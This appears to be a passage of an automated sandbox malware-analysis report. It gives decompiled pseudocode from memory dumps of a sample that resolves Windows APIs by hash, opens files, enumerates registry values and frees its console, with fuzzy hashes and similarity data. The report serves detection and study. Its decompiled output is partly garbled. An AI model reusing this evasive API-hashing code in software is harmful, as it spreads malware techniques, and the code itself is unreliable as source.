                                                                                                        						__eflags = _a4 - 4;
                                                                                                        						_t37 = (0 | _a4 == 0x00000004) + 2;
                                                                                                        						__eflags = _t37;
                                                                                                        					} else {
                                                                                                        						_t37 = 1;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E6E4862B0(_t64);
                                                                                                        				if(_a4 > 5) {
                                                                                                        					_t58 = 0;
                                                                                                        					if(_t37 != 2) {
                                                                                                        						_t16 = 3;
                                                                                                        						__eflags = _t37 - 1;
                                                                                                        						_t38 = 0;
                                                                                                        						_t39 = (_t37 == 1) ? _t16 : _t38;
                                                                                                        					} else {
                                                                                                        						_t39 = 1;
                                                                                                        					}
                                                                                                        					if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                        						_push(0);
                                                                                                        					} else {
                                                                                                        						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
                                                                                                        						_push(_t30);
                                                                                                        					}
                                                                                                        					_t40 =  &(_t56[3]);
                                                                                                        					E6E47C26C(_t40);
                                                                                                        					if(E6E47C280(_t40) != 0) {
                                                                                                        						_t56[2] = E6E4835F0(0);
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						if(_a4 == 2) {
                                                                                                        							_t55 = E6E483064(0x8e844d1e, 0xba53868);
                                                                                                        							__eflags = _t55;
                                                                                                        							if(_t55 != 0) {
                                                                                                        								 *_t55( *_t40, 0, 0, 2);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t59 =  &_v24;
                                                                                                        						E6E483698(_t59, 0xff, 8);
                                                                                                        						if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                        							_push(_t59);
                                                                                                        							_push(_t59);
                                                                                                        							_push(0);
                                                                                                        							_push( *_t40);
                                                                                                        							asm("int3");
                                                                                                        							asm("int3");
                                                                                                        						}
                                                                                                        						return 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					goto __eax;
                                                                                                        				}
                                                                                                        			}
















                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9dbebfb7a54cab14a975e94cd960e5bb57a61fa96ce671ec4cfea0cef7e91138
                                                                                                        • Instruction ID: 21f857638a473f5641f8409f7ea44f90e676ffe99ae192939085a26bd8f674f2
                                                                                                        • Opcode Fuzzy Hash: 9dbebfb7a54cab14a975e94cd960e5bb57a61fa96ce671ec4cfea0cef7e91138
                                                                                                        • Instruction Fuzzy Hash: 21314930244309BEEB502AF54D84F6B76DDDF81648F00487FFA03A9285DF55D814C6A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 30%
                                                                                                        			_entry_(void* __eflags, intOrPtr* _a4) {
                                                                                                        				intOrPtr* _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				long _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				long _v40;
                                                                                                        				int _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr* _t26;
                                                                                                        				intOrPtr _t28;
                                                                                                        				intOrPtr _t30;
                                                                                                        				intOrPtr _t31;
                                                                                                        				int _t39;
                                                                                                        				intOrPtr _t45;
                                                                                                        				long _t52;
                                                                                                        				long _t54;
                                                                                                        				intOrPtr* _t55;
                                                                                                        
                                                                                                        				_t26 = _a4;
                                                                                                        				 *_t55 = _t26;
                                                                                                        				_v20 = _t26;
                                                                                                        				_v24 = L011810B0(__eflags);
                                                                                                        				_t28 = E01182084();
                                                                                                        				_v28 = _t28;
                                                                                                        				if(_t28 != 0) {
                                                                                                        					 *_t55 = _v28;
                                                                                                        					_t45 =  *((intOrPtr*)(_v20 + 0x48))();
                                                                                                        					_t55 = _t55 - 4;
                                                                                                        					_v56 = _t45;
                                                                                                        				}
                                                                                                        				 *_t55 = _v20;
                                                                                                        				_t30 = E01182715();
                                                                                                        				 *_t55 = _v20;
                                                                                                        				_v48 = _t30;
                                                                                                        				_t31 = E01181D08(); // executed
                                                                                                        				_t52 =  *_v20;
                                                                                                        				_t54 =  *((intOrPtr*)(_t52 + 0x3c));
                                                                                                        				_t53 = _t54;
                                                                                                        				_t46 = _t52;
                                                                                                        				_v52 = _t31;
                                                                                                        				_v36 = _t52;
                                                                                                        				_v32 = _t54;
                                                                                                        				_v40 = _t52;
                                                                                                        				if(_t54 != 0) {
                                                                                                        					_v40 = _v36 + (_v32 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                        				}
                                                                                                        				if( *((short*)(_v40 + 0x5c)) != 3) {
                                                                                                        					_t39 = FreeConsole(); // executed
                                                                                                        					_v44 = _t39;
                                                                                                        				}
                                                                                                        				 *_t55 = _v20;
                                                                                                        				E01182432();
                                                                                                        				 *_t55 = _v20; // executed
                                                                                                        				E011811ED(_t46, _t53, _t54); // executed
                                                                                                        				return 0;
                                                                                                        			}



























                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1053741780.0000000001180000.00000040.00000001.sdmp, Offset: 01180000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleFree
                                                                                                        • String ID:
                                                                                                        • API String ID: 771614528-0
                                                                                                        • Opcode ID: 9b5f9ef63906aacdc26e159bdbc1f01c46337e67137d08610f01acf61f1cdebd
                                                                                                        • Instruction ID: 33e9ad902a4e7c61c2421a54de3c99b8ea9ead6f367136c08d3bfe79c2c42fc0
                                                                                                        • Opcode Fuzzy Hash: 9b5f9ef63906aacdc26e159bdbc1f01c46337e67137d08610f01acf61f1cdebd
                                                                                                        • Instruction Fuzzy Hash: CB21E7B2E0465A9FCB08EFA8D8849AEBBF1FF08304F158429D555A7340E7359841CF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 51%
                                                                                                        			E6E485BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                        				void* _t7;
                                                                                                        				void* _t12;
                                                                                                        				void* _t20;
                                                                                                        				void* _t21;
                                                                                                        				void* _t22;
                                                                                                        				long _t23;
                                                                                                        				WCHAR** _t24;
                                                                                                        				intOrPtr* _t32;
                                                                                                        				WCHAR** _t33;
                                                                                                        				long _t37;
                                                                                                        				void* _t39;
                                                                                                        				void* _t40;
                                                                                                        
                                                                                                        				_t33 = __edi;
                                                                                                        				if(__edx != 0) {
                                                                                                        					_t37 = 3;
                                                                                                        					if(_t21 != 2) {
                                                                                                        						_t7 = 3;
                                                                                                        						_t22 = 0;
                                                                                                        						_t23 =  ==  ? _t7 : _t22;
                                                                                                        					} else {
                                                                                                        						_t23 = 1;
                                                                                                        					}
                                                                                                        					if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                        						_push(0);
                                                                                                        					} else {
                                                                                                        						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
                                                                                                        						_push(_t20);
                                                                                                        					}
                                                                                                        					_t24 =  &(_t33[3]);
                                                                                                        					E6E47C26C(_t24);
                                                                                                        					if(E6E47C280(_t24) != 0) {
                                                                                                        						_t33[2] = E6E4835F0(0x80000000);
                                                                                                        						_t12 = 0;
                                                                                                        					} else {
                                                                                                        						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
                                                                                                        							_t32 = E6E483064(0x8e844d1e, 0xba53868);
                                                                                                        							if(_t32 != 0) {
                                                                                                        								 *_t32( *_t24, 0, 0, 2);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t39 = _t40 + 8;
                                                                                                        						E6E483698(_t39, 0xff, 8);
                                                                                                        						_t40 = _t40 + 0xc;
                                                                                                        						if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                        							_push(_t39);
                                                                                                        							_push(_t39);
                                                                                                        							_push(0);
                                                                                                        							_push( *_t24);
                                                                                                        							asm("int3");
                                                                                                        							asm("int3");
                                                                                                        						}
                                                                                                        						_t12 = 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					__edi[2] = 2;
                                                                                                        					_t12 = 0;
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}
















                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                        • Instruction ID: 2b7b4d513b5ef51c9bb19aaffaea41f58cfcc8f32b026300cf3ee869c3434de0
                                                                                                        • Opcode Fuzzy Hash: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                        • Instruction Fuzzy Hash: 17014930284206BEFB512AF54C44F7B778CDF82248F00483BFA0365289DF6AE459C5A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E6E485BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                        				void* _t7;
                                                                                                        				void* _t12;
                                                                                                        				void* _t20;
                                                                                                        				void* _t22;
                                                                                                        				long _t23;
                                                                                                        				WCHAR** _t24;
                                                                                                        				void* _t31;
                                                                                                        				intOrPtr* _t33;
                                                                                                        				WCHAR** _t34;
                                                                                                        				void* _t38;
                                                                                                        				long _t39;
                                                                                                        				void* _t41;
                                                                                                        				void* _t42;
                                                                                                        
                                                                                                        				_t34 = __edi;
                                                                                                        				_t31 = 5;
                                                                                                        				_t38 = 2;
                                                                                                        				_t39 =  !=  ? _t31 : _t38;
                                                                                                        				if(__ebx != 2) {
                                                                                                        					_t7 = 3;
                                                                                                        					_t22 = 0;
                                                                                                        					_t23 =  ==  ? _t7 : _t22;
                                                                                                        				} else {
                                                                                                        					_t23 = 1;
                                                                                                        				}
                                                                                                        				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                        					_push(0);
                                                                                                        				} else {
                                                                                                        					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
                                                                                                        					_push(_t20);
                                                                                                        				}
                                                                                                        				_t24 =  &(_t34[3]);
                                                                                                        				E6E47C26C(_t24);
                                                                                                        				if(E6E47C280(_t24) != 0) {
                                                                                                        					_t34[2] = E6E4835F0(0xc0000000);
                                                                                                        					_t12 = 0;
                                                                                                        				} else {
                                                                                                        					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
                                                                                                        						_t33 = E6E483064(0x8e844d1e, 0xba53868);
                                                                                                        						if(_t33 != 0) {
                                                                                                        							 *_t33( *_t24, 0, 0, 2);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t41 = _t42 + 8;
                                                                                                        					E6E483698(_t41, 0xff, 8);
                                                                                                        					_t42 = _t42 + 0xc;
                                                                                                        					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                        						_push(_t41);
                                                                                                        						_push(_t41);
                                                                                                        						_push(0);
                                                                                                        						_push( *_t24);
                                                                                                        						asm("int3");
                                                                                                        						asm("int3");
                                                                                                        					}
                                                                                                        					_t12 = 1;
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}

















                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                        • Instruction ID: 9b64ba86d569d438e71d6f0825610586b921ddce05dfa613b12a84e88770d9f6
                                                                                                        • Opcode Fuzzy Hash: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                        • Instruction Fuzzy Hash: 7401F93138430ABAFB5126F54D45F7B778CDFC2658F004837FA0265289EF56D855C561
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E6E485BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                        				void* _t7;
                                                                                                        				void* _t12;
                                                                                                        				void* _t20;
                                                                                                        				void* _t22;
                                                                                                        				long _t23;
                                                                                                        				WCHAR** _t24;
                                                                                                        				intOrPtr* _t33;
                                                                                                        				WCHAR** _t34;
                                                                                                        				long _t38;
                                                                                                        				void* _t40;
                                                                                                        				void* _t41;
                                                                                                        
                                                                                                        				_t34 = __edi;
                                                                                                        				_t38 = 2;
                                                                                                        				asm("adc ebp, 0x0");
                                                                                                        				if(__ebx != 2) {
                                                                                                        					_t7 = 3;
                                                                                                        					_t22 = 0;
                                                                                                        					_t23 =  ==  ? _t7 : _t22;
                                                                                                        				} else {
                                                                                                        					_t23 = 1;
                                                                                                        				}
                                                                                                        				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                        					_push(0);
                                                                                                        				} else {
                                                                                                        					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
                                                                                                        					_push(_t20);
                                                                                                        				}
                                                                                                        				_t24 =  &(_t34[3]);
                                                                                                        				E6E47C26C(_t24);
                                                                                                        				if(E6E47C280(_t24) != 0) {
                                                                                                        					_t34[2] = E6E4835F0(0xc0000000);
                                                                                                        					_t12 = 0;
                                                                                                        				} else {
                                                                                                        					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
                                                                                                        						_t33 = E6E483064(0x8e844d1e, 0xba53868);
                                                                                                        						if(_t33 != 0) {
                                                                                                        							 *_t33( *_t24, 0, 0, 2);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t40 = _t41 + 8;
                                                                                                        					E6E483698(_t40, 0xff, 8);
                                                                                                        					_t41 = _t41 + 0xc;
                                                                                                        					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                        						_push(_t40);
                                                                                                        						_push(_t40);
                                                                                                        						_push(0);
                                                                                                        						_push( *_t24);
                                                                                                        						asm("int3");
                                                                                                        						asm("int3");
                                                                                                        					}
                                                                                                        					_t12 = 1;
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                        • Instruction ID: df889f6d755ae685939f71973c30878dd20c8806023e7031b71fef696b4c374e
                                                                                                        • Opcode Fuzzy Hash: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                        • Instruction Fuzzy Hash: AE012D3568030A7AFB5166F54D44F7B778DDBC1258F004837FA02652C9EE1AD855C561
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 48%
                                                                                                        			E6E485BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                        				void* _t6;
                                                                                                        				void* _t11;
                                                                                                        				void* _t19;
                                                                                                        				void* _t21;
                                                                                                        				long _t22;
                                                                                                        				WCHAR** _t23;
                                                                                                        				intOrPtr* _t30;
                                                                                                        				WCHAR** _t31;
                                                                                                        				long _t35;
                                                                                                        				void* _t37;
                                                                                                        				void* _t38;
                                                                                                        
                                                                                                        				_t31 = __edi;
                                                                                                        				_t35 = 3;
                                                                                                        				if(__ebx != 2) {
                                                                                                        					_t6 = 3;
                                                                                                        					_t21 = 0;
                                                                                                        					_t22 =  ==  ? _t6 : _t21;
                                                                                                        				} else {
                                                                                                        					_t22 = 1;
                                                                                                        				}
                                                                                                        				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                        					_push(0);
                                                                                                        				} else {
                                                                                                        					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
                                                                                                        					_push(_t19);
                                                                                                        				}
                                                                                                        				_t23 =  &(_t31[3]);
                                                                                                        				E6E47C26C(_t23);
                                                                                                        				if(E6E47C280(_t23) != 0) {
                                                                                                        					_t31[2] = E6E4835F0(0x100);
                                                                                                        					_t11 = 0;
                                                                                                        				} else {
                                                                                                        					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
                                                                                                        						_t30 = E6E483064(0x8e844d1e, 0xba53868);
                                                                                                        						if(_t30 != 0) {
                                                                                                        							 *_t30( *_t23, 0, 0, 2);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t37 = _t38 + 8;
                                                                                                        					E6E483698(_t37, 0xff, 8);
                                                                                                        					_t38 = _t38 + 0xc;
                                                                                                        					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                        						_push(_t37);
                                                                                                        						_push(_t37);
                                                                                                        						_push(0);
                                                                                                        						_push( *_t23);
                                                                                                        						asm("int3");
                                                                                                        						asm("int3");
                                                                                                        					}
                                                                                                        					_t11 = 1;
                                                                                                        				}
                                                                                                        				return _t11;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                        • Instruction ID: cf477ea30c3d8cb20699addafb9282d697b8b30d5ff8d57587a226db24d4d384
                                                                                                        • Opcode Fuzzy Hash: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                        • Instruction Fuzzy Hash: E1017B3168030ABAFB512AF44C44FBB778CDF82258F00483BFA03652C9EF1AE855C5A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 48%
                                                                                                        			E6E485C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                        				void* _t6;
                                                                                                        				void* _t11;
                                                                                                        				void* _t19;
                                                                                                        				void* _t21;
                                                                                                        				long _t22;
                                                                                                        				WCHAR** _t23;
                                                                                                        				intOrPtr* _t30;
                                                                                                        				WCHAR** _t31;
                                                                                                        				long _t35;
                                                                                                        				void* _t37;
                                                                                                        				void* _t38;
                                                                                                        
                                                                                                        				_t31 = __edi;
                                                                                                        				_t35 = 3;
                                                                                                        				if(__ebx != 2) {
                                                                                                        					_t6 = 3;
                                                                                                        					_t21 = 0;
                                                                                                        					_t22 =  ==  ? _t6 : _t21;
                                                                                                        				} else {
                                                                                                        					_t22 = 1;
                                                                                                        				}
                                                                                                        				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                        					_push(0);
                                                                                                        				} else {
                                                                                                        					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
                                                                                                        					_push(_t19);
                                                                                                        				}
                                                                                                        				_t23 =  &(_t31[3]);
                                                                                                        				E6E47C26C(_t23);
                                                                                                        				if(E6E47C280(_t23) != 0) {
                                                                                                        					_t31[2] = E6E4835F0(0);
                                                                                                        					_t11 = 0;
                                                                                                        				} else {
                                                                                                        					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
                                                                                                        						_t30 = E6E483064(0x8e844d1e, 0xba53868);
                                                                                                        						if(_t30 != 0) {
                                                                                                        							 *_t30( *_t23, 0, 0, 2);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t37 = _t38 + 8;
                                                                                                        					E6E483698(_t37, 0xff, 8);
                                                                                                        					_t38 = _t38 + 0xc;
                                                                                                        					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                        						_push(_t37);
                                                                                                        						_push(_t37);
                                                                                                        						_push(0);
                                                                                                        						_push( *_t23);
                                                                                                        						asm("int3");
                                                                                                        						asm("int3");
                                                                                                        					}
                                                                                                        					_t11 = 1;
                                                                                                        				}
                                                                                                        				return _t11;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
                                                                                                        • Instruction ID: 0e36d7ddf8f9d270d6283d513ae22b9d034f2d37fb617cf1fac05426b1b46719
                                                                                                        • Opcode Fuzzy Hash: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
                                                                                                        • Instruction Fuzzy Hash: D9012B3568030A7AFB612AF54D44FBB774CDF81658F00483BFA0265289EF16E555C5A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 63%
                                                                                                        			E6E485E10(void* __ecx, intOrPtr _a4) {
                                                                                                        				long _v16;
                                                                                                        				long _t4;
                                                                                                        				void* _t8;
                                                                                                        				void** _t9;
                                                                                                        				intOrPtr _t17;
                                                                                                        				long* _t18;
                                                                                                        
                                                                                                        				_push(_t16);
                                                                                                        				_t8 = __ecx;
                                                                                                        				_t17 = _a4;
                                                                                                        				if(_t17 != 0) {
                                                                                                        					asm("pxor xmm0, xmm0");
                                                                                                        					asm("movq [esi], xmm0");
                                                                                                        				}
                                                                                                        				_t9 = _t8 + 0xc;
                                                                                                        				if(E6E47C280(_t9) != 0) {
                                                                                                        					L7:
                                                                                                        					_t4 = 0;
                                                                                                        					goto L10;
                                                                                                        				} else {
                                                                                                        					asm("stosd");
                                                                                                        					asm("stosd");
                                                                                                        					if(E6E483064(0x8e844d1e, 0xba53868) == 0) {
                                                                                                        						_t4 = 0;
                                                                                                        					} else {
                                                                                                        						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
                                                                                                        					}
                                                                                                        					if(_t4 != 0xffffffff) {
                                                                                                        						if(_t17 != 0) {
                                                                                                        							 *_t18 = _t4;
                                                                                                        							asm("movq xmm0, [esp]");
                                                                                                        							asm("movq [esi], xmm0");
                                                                                                        						}
                                                                                                        						L10:
                                                                                                        						return _t4;
                                                                                                        					} else {
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}










                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E485D48,?,?), ref: 6E485E5C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
                                                                                                        • Instruction ID: 4194edc8d41753ab7a1c795d0ecf6e7c8c84bed5cd89d2023a63e1f65c2a224e
                                                                                                        • Opcode Fuzzy Hash: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
                                                                                                        • Instruction Fuzzy Hash: 09F04931A08B1179DB515BB89C40FA773E8DFD1750F114B2FF542A6244E760C444C2A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E48564C(void* __ecx) {
                                                                                                        				long _t9;
                                                                                                        				char* _t11;
                                                                                                        				void* _t16;
                                                                                                        				int _t17;
                                                                                                        				int _t18;
                                                                                                        				int* _t19;
                                                                                                        
                                                                                                        				_t18 = 0;
                                                                                                        				_t17 = _t19[0x48];
                                                                                                        				_t16 = __ecx;
                                                                                                        				_t11 =  &(_t19[1]);
                                                                                                        				 *_t17 = 0;
                                                                                                        				 *((intOrPtr*)(_t17 + 4)) = 0;
                                                                                                        				 *((intOrPtr*)(_t17 + 8)) = 0;
                                                                                                        				while(1) {
                                                                                                        					 *_t19 = 0x105;
                                                                                                        					if(E6E483064(0x150c05fc, 0xed2313f7) == 0) {
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
                                                                                                        					if(_t9 == 0) {
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        					return _t17;
                                                                                                        					L4:
                                                                                                        					E6E47E644(_t17, _t11,  *_t17);
                                                                                                        					_t18 = _t18 + 1;
                                                                                                        				}
                                                                                                        			}










                                                                                                        APIs
                                                                                                        • RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E485698
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
